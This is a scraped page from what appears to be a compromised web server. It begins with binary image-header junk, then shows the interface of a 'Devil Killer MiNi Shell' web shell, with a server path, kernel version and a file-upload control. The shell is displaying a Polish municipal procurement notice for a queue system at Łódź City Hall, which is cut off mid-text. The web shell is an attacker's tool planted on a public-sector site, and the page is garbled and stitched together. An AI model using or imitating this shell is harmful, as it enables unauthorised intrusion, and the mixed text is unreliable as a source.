JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241009/0053885601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup Systemu Kolejkowego dla UMŁ oraz Rozszerzonej Gwarancji </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi zamawiający centralny</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Urząd Miasta Łodzi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 472057632</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Piotrkowska 104</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">90-926</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@uml.lodz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://uml.lodz.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup Systemu Kolejkowego dla UMŁ oraz Rozszerzonej Gwarancji </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7ebe2b0f-ab48-4c26-9769-aea28feb5780</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00538856</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00000422/26/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.73 Zakup Systemu Kolejkowego oraz Usługi Utrzymaniowej na 5 lat</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://uml.ezamawiajacy.pl/pn/ML/demand/177519/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">[Numeracja zgodna z SWZ]<br/>16.1	Środki komunikacji elektronicznej, przy użyciu, których Zamawiający będzie komunikował się z Wykonawcami oraz wymagania techniczne dla dokumentów elektronicznych oraz środków komunikacji elektronicznej.<br/>16.1.1	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się za pośrednictwem Platformy, która jest dostępna pod adresem https://uml.ezamawiajacy.pl<br/>16.1.2	Korzystanie z Platformy jest bezpłatne.<br/>16.1.3	W postępowaniu przekazywanie oświadczeń, wniosków, zawiadomień oraz informacji między Zamawiającym a Wykonawcami odbywa się za pośrednictwem Platformy znajdującej się pod adresem: https://uml.ezamawiajacy.pl poprzez kafelek „Wiadomości” kierujący do modułu korespondencji.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">[Numeracja zgodna z SWZ]<br/>16.1.4	Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich wpływu na Platformę<br/>16.1.11	Zamawiający określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>16.1.11.1	Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>16.1.11.2	Komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej przeglądarki internetowej;<br/>16.1.11.3	Zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługująca TLS 1.2;<br/>16.1.11.4	Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>16.1.12	Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 2 GB (pojedynczy plik): <br/>txt,rtf,pdf,xps,odt,ods,odp,doc,xls,ppt,docx,xlsx,pptx,csv,jpg,jpeg,tif,tiff,geotiff,png,svg,wav,mp3,avi,mpg,mpeg,mp4,m4a,mpeg4,ogg,ogv,zip,tar,gz,gzip,7z,html,xhtml,css,xml,xsd,gml,rng,xsl,xslt,tsl,xmlsig,xades,pades,cades,asic,asics,sig,xmlenc,dxf,ath,prd</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.10.) Przyczyny odstąpienia od komunikacji elektronicznej: </h3> <p class="mb-0">zamawiający wymaga przedstawienia modelu fizycznego, modelu w skali lub próbki, których nie można przekazać przy użyciu środków komunikacji elektronicznej (art. 65 ust. 1 pkt 4 ustawy)</p> <h3 class="mb-0">3.11.) Sposób nieelektronicznego składania ofert, wniosków, oświadczeń oraz innych dokumentów: <span class="normal">1. Dotyczy złożenia oferty wraz z załącznikami<br/>Ofertę wraz z załącznikami należy złożyć na Platformie pod adresem: https://uml.ezamawiajacy.pl <br/>Po zalogowaniu się i przejściu do konkretnego postępowania Wykonawca wybiera kafelek „FORMULARZ OFERTY/WNIOSKU” lub wybiera sekcję „Przygotowanie oferty” <br/><br/>2. Złożenie zestawu do prezentacji Systemu<br/>Zamawiający wymaga złożenia przez Wykonawcę przedmiotowych środków dowodowych na które składać się będzie zestaw do prezentacji Systemu. Przedmiotowe środki dowodowe Wykonawca składa do upływu terminu składania ofert o którym mowa w pkt. 22.3 SWZ w Wydziale Informatyki w Departamencie Organizacji Urzędu i Obsługi Mieszkańców Urzędu Miasta Łodzi ul. Piotrkowska 104, 90-926 Łódź Budynek B w godzinach pracy Zamawiającego, tj. 8:00 – 16:00 w dni robocze, za wyjątkiem wtorku w godzinach pracy 9:00 – 17:00.<br/>Prezentowany System będzie składał się z następujących komponentów:<br/>a)	1 automat biletowy,<br/>b)	1 monitor zbiorczy z komputerem sterującym,<br/>c)	1 wyświetlacz stanowiskowy,<br/>d)	wszystkie komponenty Oprogramowania oraz – do celów prezentacji dostęp do własnej bramki sms,<br/>e)	komputer dla serwera centralnego oraz urządzenia do prezentacji pracy aplikacji do obsługi stanowiska,<br/>f)	komplet kabli i przewodów połączeniowych niezbędnych do przeprowadzenia prezentacji</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">[Numeracja zgodna z SWZ]<br/>35.1.	Zgodnie z art. 13 ust. 1 i 2 ogólnego rozporządzenia o ochronie danych osobowych<br/>z dnia 27 kwietnia 2016 r. (rozporządzenie Parlamentu Europejskiego i Rady UE 2016/679 w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych<br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE) Zamawiający informuje, że:	<br/>35.1.1.	Administratorem danych osobowych jest Prezydent Miasta Łodzi z siedzibą w Łodzi przy ul. Piotrkowskiej 104, 90-926 Łódź, tel.: +48 (42) 638-44-44, fax: +48 (42) 272-60-01, e-mail: lckm@uml.lodz.pl <br/>35.1.2.	Administrator wyznaczył inspektora oraz zastępcę inspektora ochrony danych osobowych, z którymi może się Pani/Pan skontaktować poprzez e-mail iod@uml.lodz.pl Z inspektorem ochrony danych i jego zastępcą można się kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych przez Urząd Miasta Łodzi oraz korzystania z praw związanych<br/>z przetwarzaniem danych.<br/>35.1.3.	Podanie danych osobowych jest warunkiem koniecznym do realizacji sprawy<br/>w Urzędzie Miasta Łodzi.<br/>35.1.4.	Ogólną podstawę do przetwarzania danych stanowi art. 6 ust. 1 lit. b i c oraz art. 10 ogólnego rozporządzenia.<br/>35.1.5.	Szczegółowe cele przetwarzania danych zostały wskazane w następujących przepisach:<br/>35.1.5.1. ustawie z dnia 11 września 2019 r. – Prawo zamówień publicznych;<br/>35.1.5.2. ustawie z dnia 23 kwietnia 1964 r. – Kodeks cywilny;<br/>35.1.5.3. ustawie z dnia 27 sierpnia 2009 r. o finansach publicznych;<br/>35.1.5.4. ustawie z dnia 29 września 1994 r. o rachunkowości.<br/>35.1.6.	Pani/Pana dane będą przetwarzane w celu:<br/>35.1.6.1. przeprowadzenia postępowania o udzielenie zamówienia publicznego<br/>i wyłonienie wykonawcy;<br/>35.1.6.2. zawarcia umowy;<br/>35.1.6.3. rozliczenia finansowo- księgowego.<br/>35.1.7.	Dane osobowe mogą być udostępniane innym podmiotom, uprawnionym <br/>do ich otrzymania na podstawie obowiązujących przepisów prawa, tj. na podstawie art. 18 i art. 74 Prawa zamówień publicznych a ponadto odbiorcom danych<br/>w rozumieniu przepisów o ochronie danych osobowych, tj. podmiotom świadczącym usługi pocztowe, kurierskie, usługi informatyczne, bankowe, ubezpieczeniowe, osobom i podmiotom zainteresowanym prowadzonym postępowaniem o udzielenie zamówienia publicznego, a także podmiotom korzystającym z Biuletynu Informacji Publicznej, Biuletynu Zamówień Publicznych, Bazy konkurencyjności oraz internetowej platformy zakupowej – eKatalogi, będącej w gestii Urzędu Zamówień Publicznych. Dane osobowe nie będą przekazywane do państw trzecich, na podstawie szczególnych regulacji prawnych, w tym umów międzynarodowych.<br/>35.1.8.	Dane osobowe będą przetwarzane, w tym przechowywane przez okres 4 lat, licząc od pierwszego stycznia roku następującego po roku, w którym sprawa została zakończona, a następnie, zgodnie z przepisami ustawy z dnia 14 lipca 1983 r.<br/>o narodowym zasobie archiwalnym i archiwach, przez okres 5 lat, zgodnie kategorią B5, w przypadku dokumentacji postępowania oraz 10 lat w związku z zawartą umową, zgodnie z kategorią archiwalną B10, a w przypadku zmiany kategorii archiwalnej dokumentacji przez okres zgodny ze zmienioną kategorią archiwalną dokumentacji. W przypadku zamówień finansowanych ze środków funduszy europejskich lub innych środków niż pochodzące z budżetu Unii Europejskiej na podstawie odrębnych przepisów tym zakresie do 25 lat.<br/>Ciąg dalszy w pkt 35.1.9-35.1.12 i 35.2 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DOM-WZP-II.271.42.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup Systemu Kolejkowego, który zapewni wydajną i sprawną obsługę wizyt mieszkańców w Urzędzie Miasta Łodzi oraz Rozszerzonej Gwarancji, zgodnie z przepisami ustawy Prawo zamówień publicznych. Przedmiot Zamówienia musi spełniać łącznie wszystkie wymagania, opisane w Umowie, OPZ oraz załącznikach do tych dokumentów. Realizacja prac następować będzie zgodnie z podziałem na Etapy określone w rozdziale 5 OPZ. Ukończenie prac w danym etapie musi być potwierdzone Protokołem Odbioru i jest warunkiem przejścia do kolejnego Etapu.<br/>Wykonawca musi dostarczyć określone w Umowie i OPZ elementy niezbędne do uruchomienia i późniejszej eksploatacji Systemu Kolejkowego o deklarowanej funkcjonalności i charakterystyce:<br/>1.	pełną i nieprzerwaną obsługę mieszkańców w zakresie umawianych wizyt w Urzędzie Miasta Łodzi,<br/>2.	możliwości dokonywania modyfikacji Oprogramowania w celu dopasowania go do specyficznych potrzeb Zamawiającego (o ile będzie to konieczne),<br/>3.	opracowanie i dostarczenie wymaganej Dokumentacji,<br/>4.	przeprowadzenie wdrożenia Systemu,<br/>5.	zapewnienie Asysty Powdrożeniowej,<br/>6.	udzielenie Rozszerzonej Gwarancji<br/>Szczegółowy opis przedmiotu zamówienia znajduje się w umowie i załączniku nr 1 do OPZ (SOPZ) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48151000-1 - Komputerowy system sterujący</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30144200-2 - Maszyny do wydawania biletów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwości skorzystania z prawa opcji w ramach którego Wykonawca będzie zobowiązany do świadczenia Usługi Rozwoju Systemu Kolejkowego w wymiarze do 150 roboczogodzin. <br/>1.	W ramach Usługi Rozwoju Wykonawca będzie realizował wymienione niżej usługi:<br/>a)	rozwijanie API służącego do wymiany i pozyskiwania danych z Systemu do wykorzystania w aplikacjach rozwijanych przez Zamawiającego lub partnerów Zamawiającego. <br/>b)	tworzenie nowych oraz dostosowanie istniejących funkcji Systemu w związku ze zmianami w przepisach wewnętrznych Zamawiającego.<br/>c)	tworzenie nowych oraz dostosowanie istniejących funkcji Systemu do wymagań zdefiniowanych przez Zamawiającego,<br/>d)	udzielanie dodatkowych konsultacji Zamawiającemu lub podmiotowi wskazanemu przez Zamawiającego w zakresie obsługi Systemu<br/>2.	Prawo opcji jest uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać w ramach realizacji niniejszej umowy. W przypadku nieskorzystania przez Zamawiającego z prawa opcji Wykonawcy nie przysługują żadne roszczenia z tego tytułu<br/>3.	Podstawą do realizacji prac objętych Usługą Rozwoju będzie zatwierdzone zlecenie zawierające wycenę czasową.<br/>4.	W przypadku stwierdzenia zawyżenia wartości wyceny czasowej, Zamawiający zwróci się do Wykonawcy o złożenie stosownych wyjaśnień oraz o ponowną wycenę zlecenia. <br/>5.	Wykonawca zobowiąże się do świadczenia Usług Rozwoju zgodnie z zakresem i harmonogramem wykazanym w zleceniu.<br/>6.	Usługi Rozwoju będą realizowane w lokalizacjach Zamawiającego, siedzibie Wykonawcy lub za pomocą połączenia zdalnego udostępnionego przez Zamawiającego.<br/>7.	Zamawiający każdorazowo, przed rozpoczęciem prac uzgodni z Wykonawcą sposób realizacji Usługi Rozwoju. <br/>8.	Prawidłowo i kompletnie przekazany do Wykonawcy Formularz Zlecenia będzie warunkiem przystąpienia do realizacji prac.<br/>9.	Zrealizowane Usługi Rozwoju będą podlegać procedurze Odbioru wskazanej w Umowie.<br/>10.	Każda Usługa Rozwoju będzie skutkować aktualizacją odpowiedniej części Dokumentacji jej dotyczącej. <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2029-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">36</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena brutto w PLN za wykonanie 150 roboczogodzin świadczenia usługi rozwoju Systemu kolejkowego w ramach prawa opcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">4</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Automaty biletowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aplikacja www</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">API: Wystawienie Web API (RESTful)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 6</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Oprogramowanie-kalendarz</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> [Numeracja zgodna z SWZ]<br/>10.1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki udziału w postępowaniu dotyczące:<br/>10.1.4.	zdolności technicznej lub zawodowej: <br/>10.1.4.1.	Warunek zdolności technicznej zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż należycie wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie:<br/>•	minimum 2 (dwa) zamówienia polegające na dostawie i wdrożeniu systemu kolejkowego w jednostkach administracji publicznej o wartości minimum 200 000,00 PLN brutto każda <br/>Uwagi: <br/>1)	Przez administrację publiczną Zamawiający rozumie administrację samorządową <br/>i administrację rządową)<br/>2)	W przypadku gdy Wykonawca wykonywał w ramach jednego kontraktu/umowy większy zakres prac, dla potrzeb zamówienia powinien wyodrębnić i podać zakres /wartość każdego zamówienia, o którym mowa powyżej.<br/>3)	Jeżeli Wykonawca wykazuje doświadczenie nabyte w ramach kontraktu (zamówienia/umowy) realizowanego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), Zamawiający nie dopuszcza by Wykonawca polegał na doświadczeniu grupy Wykonawców, której był członkiem, jeżeli faktycznie<br/> i konkretnie nie wykonywał wykazywanego zakresu prac. Zamawiający zastrzega możliwość zwrócenia się do Wykonawcy o wyjaśnienia w zakresie faktycznie <br/>i konkretnie wykonywanego zakresu prac oraz przedstawienia stosownych dowodów np. umowy konsorcjum, z której wynika zakres obowiązków czy wystawionych przez Wykonawcę faktur.<br/>4)	Dla potrzeb oceny spełniania warunku określonego, powyżej, jeśli wartość lub wartości zostaną podane w walutach innych niż PLN, Zamawiający przyjmie średni kurs danej waluty publikowany przez Narodowy Bank Polski w dniu publikacji ogłoszenia <br/>o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, Narodowy Bank Polski nie publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni kurs waluty publikowany pierwszego dnia, po dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, w którym zostanie on opublikowany.<br/>5)	Jeżeli Wykonawca powołuje się na doświadczenie w realizacji dostaw, wykonywanych wspólnie z innymi Wykonawcami, wykaz dostaw, dotyczy dostaw, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/><br/>10.1.4.2.	Warunek zdolności zawodowej zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej 6 osobami które będą uczestniczyć w wykonywaniu zamówienia, tj.<br/>10.1.4.2.1.	Kierownikiem projektu posiadającym co najmniej trzyletnie doświadczenie w 